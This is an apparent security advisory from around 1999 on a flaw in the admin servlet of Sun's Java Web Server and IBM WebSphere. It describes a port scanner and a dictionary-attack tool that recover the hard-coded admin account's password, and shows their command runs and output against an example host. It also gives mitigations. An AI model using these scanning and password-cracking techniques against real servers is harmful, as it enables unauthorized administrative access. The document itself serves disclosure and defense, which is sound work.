An interesting security weakness is present in Sun's Java Web Server 1.1.3. The weakness also appears in IBM's WebSphere 2.0.2, and is, in fact, inherited from Sun's server toolkit. In what follows we will describe a problem common to both web servers. However, we will generally refer only to Sun's Java Web Server when we mention specific details, and often we will not mention a web server by name at all. Thus we will use an expression such as "the admin servlet" instead of the much more cumbersome "the admin servlet in IBM's WebSphere and the Java Web Server." It should be understood that what we write applies equally to both products.
The Java Web Server comes equipped with a handy web interface for server administration. In order to access that interface an administrator points a web browser at a standard URL and downloads a Java applet, com.sun.server.admin.toolkit.AdminApplet. The applet requires a user name and password in order to gain access to the web server for administrative purposes. When one types in a user name and password and then presses the "Log in" button, the applet submits them to a listening admin servlet, com.sun.server.http.AdminServlet. Since the applet uses MD5 to hash the user name, password, and some other items, the information is not submitted as plain text. This is a form of digest authentication.
One might be tempted to think that by restricting access to the admin applet, or by removing it altogether, one is thereby preventing unauthorized access to the web server. Unfortunately, this is not the case, for it is an easy matter to bypass the admin applet completely and interact directly with the admin servlet. To make matters worse, though the admin servlet's port can be changed, the servlet cannot be disabled, since the Java Web Server uses it internally at startup and shutdown. To make matters worse still, the name of the web server's administrative user, "admin," appears to be hard coded into the web server, and there is no way to change it, either by using the handy web interface or by setting a web server property. These last three facts make it a simple matter to write a port scanner to detect the presence of an admin servlet and to launch a multi-threaded, on-line attack on the admin password.
Contents
As proof of concept, we have written a simple, multi-threaded port scanner,
AdminScanner.java,
which accepts a host name, low port, and high port, and then launches
PortScanner Threads
to examine the specified host for the presence of an admin servlet listening on
a port in the specified range. Since AdminScanner looks for responses
that characterize the admin servlet, it can distinguish between the
Java Web Server and IBM's WebSphere, and it reports other
potentially interesting responses, as the following edited example shows:
Contents
Once an admin servlet has been found, one can readily mount a multi-threaded,
on-line attack against the web server's "admin" password. As proof of
concept we have written a simple cracking utility,
CrackAdmin.java.
One need only supply the host name and port number of an admin servlet,
together with the full path of a
gzipped dictionary file,
the maximum number of active Threads desired, and the number of passwords
to check per Thread. CrackAdmin then reads the complete dictionary,
calculates the proper number of
cracking Threads to launch,
and proceeds to mount a dictionary attack. In doing so it makes use of
MD5 to handle the digest
authentication. Continuing with our previous example is very instructive:
Contents
Obviously, knowing the admin password allows one complete access
to the web server's administrative interface via the admin applet.
Even if the admin applet is disabled, one can still manipulate the
admin servlet and perform all of the same administrative
activities. Thus it is really the admin servlet that is the source
of all of the trouble. The admin applet simply makes the hacker's
job a little easier.
Unfortunately for web server administrators, the admin servlet runs
outside of the control of the Java Web Server as, essentially,
a mini-web server within a web server. Consequently, it cannot be
configured like other servlets in the Java Web Server. As we
previously mentioned, it is not possible to disable the admin
servlet without breaking the web server at the same time.
So what should be done about the problematic admin servlet?
The most prudent action, of course, would be to use neither the
Java Web Server nor IBM's WebSphere until the problem is corrected.
We believe that the proper solution to the problem is to not have such
servlets lurking within web servers as back doors awaiting hackers to enter.
If Sun and IBM insist upon providing them, then admin servlets ought to be
run through their HTTPS web servers, and certificate authentication
should be required for administrative access to them. Until the admin
servlet problem is properly solved, web server administrators of the
affected web servers should change all web server passwords to long
character strings unrelated to dictionary entries in any language.
Since passphrases can still be guessed, using a cryptographically strong hash
function to generate a password string is a better idea. Additionally,
access to the port on which the admin servlet is listening should be blocked.
2. Finding the Admin Servlet
% java AdminScanner bozo.victims.com 1 10000
Scanning bozo.victims.com from port 1 to port 10000:
.
.
.
PortScanner-25: Got the following interesting response from
http://bozo.victims.com:25/servlet/admin
bozo.victims.com Sendmail SMI-8.6/SMI-SVR4 ready at Wed, 31 Mar 1999
14:51:46 -0500
PortScanner-21: Got the following interesting response from
http://bozo.victims.com:21/servlet/admin
220 bozo FTP server (UNIX(r) System V Release 4.0) ready.
PortScanner-79: Got the following interesting response from
http://bozo.victims.com:79/servlet/admin
Name TTY Idle When Where
.......................................................................
.......................................................................
.......................................................................
.
.
.
(9000) Running Finalization and Garbage Collection
.......................................................................
.......................................................................
.......................................................................
.
.
.
PortScanner-9091: Java Web Server Admin Servlet found at
http://bozo.victims.com:9091/servlet/admin
PortScanner-9099: Java Web Server Admin Servlet found at
http://bozo.victims.com:9099/servlet/admin
PortScanner-9527: IBM WebSphere Application Server Admin Servlet found
at http://bozo.victims.com:9527/servlet/admin
.......................................................................
.................^C
3. Cracking the Admin Password
% java -ms96m -mx128m CrackAdmin bozo.victims.com 9527
../Dicts/big.dict.gz 100 100
Reading dictionary entries from ../Dicts/big.dict.gz...
Read 338961 entries from ../Dicts/big.dict.gz
Target URL set to http://bozo.victims.com:9527/servlet/admin
Nonce set to 1b85777f97b65a3fe25eae94a4f1c516
Deploying 3390 Threads to test 338962 passwords
Allowing at most 100 active Threads at any time
Each Thread will test 100 passwords
AdminCracker-0: The admin password for
http://bozo.victims.com:9527/servlet/admin is "admin"
% java -ms96m -mx128m CrackAdmin bozo.victims.com 9099
../Dicts/big.dict.gz 100 100
Reading dictionary entries from ../Dicts/big.dict.gz...
Read 338961 entries from ../Dicts/big.dict.gz
Target URL set to http://bozo.victims.com:9099/servlet/admin
Nonce set to 55e5ea352175da356bea57b4aeb14aac
Deploying 3390 Threads to test 338962 passwords
Allowing at most 100 active Threads at any time
Each Thread will test 100 passwords
.......................................................................
.......................................................................
.......................................................................
.
.
.
(1800) Running Finalization and Garbage Collection...
.......................................................................
.......................................................................
.......................................................................
.
.
.
.......................................................................
.......................................................................
.........................?.............................................
.......................................................................
Nonce set to e659376b45a5e317aa9983a0d6849f20
........
AdminCracker-1722: The admin password for
http://bozo.victims.com:9099/servlet/admin is "magic"
.^C
4. Conclusions